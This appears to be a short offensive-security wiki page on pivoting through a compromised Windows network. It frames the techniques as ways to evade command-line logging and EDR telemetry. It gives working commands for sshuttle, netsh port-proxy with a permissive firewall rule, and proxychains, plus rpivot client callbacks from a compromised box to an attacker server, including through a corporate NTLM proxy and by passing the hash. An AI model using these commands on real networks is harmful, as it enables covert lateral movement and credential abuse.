Pivoting

This article will go through ways to use a windows machine as a proxy and ways to pivot through the network.

But why would we do a thing like this in the first place? Well, the pros are:

  1. Bypass command line logging

  2. No execution on the host, EDRs don't have telemetry over this

  3. We touch less hosts

But the cons are:

  1. You lose being in context of the windows user due to the fact that you don't have the privilege of windows SSO.(Need credentials)

Let's look at some ways technologies we can use to pivot.(C2 Frameworks like metasploit and cobalt strike have multiple guides on how to do so.)

Once you are in the network, you can use tools like Impacket and RPCclinet to gain info and move laterally throughout the network.

SSHuttle

This can create a VPN connection with only VPN access on the host. Note that the only requirement this needs is for python to be installed.

The below will forward all traffic.

sshuttle -r <USER>@<HOST> 0.0.0.0/0

Firewalls

Windows Firewall can to proxy connections similarly to iptables redirectors. 

netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCALPORT connectaddress=REMOTE_ADDRESS connectport=REMOTE_PORT protocol=tcp
netsh advfirewall firewall add rule name=”Evill” protocol=TCP dir=in localip=LOCAL_ADDRESS localport=LOCAL_PORT action=allow

Proxychains for Windows

To pivot a windows operator machine into the target network, this can be used in conjunction with a socks proxy.

proxychains_win32_x64.exe –f <CONFIG_FILE> <CMD> <CMDARGS>

Rpivot

This tunnels traffic into internal networks via socks4proxy in python with only the standard library. This supports NTLM proxy authentication with username or NTLM hashes:

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

Through corporate proxy

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

PreviousCommands to AvoidNextBenefits of Using APIs

Last updated

Was this helpful?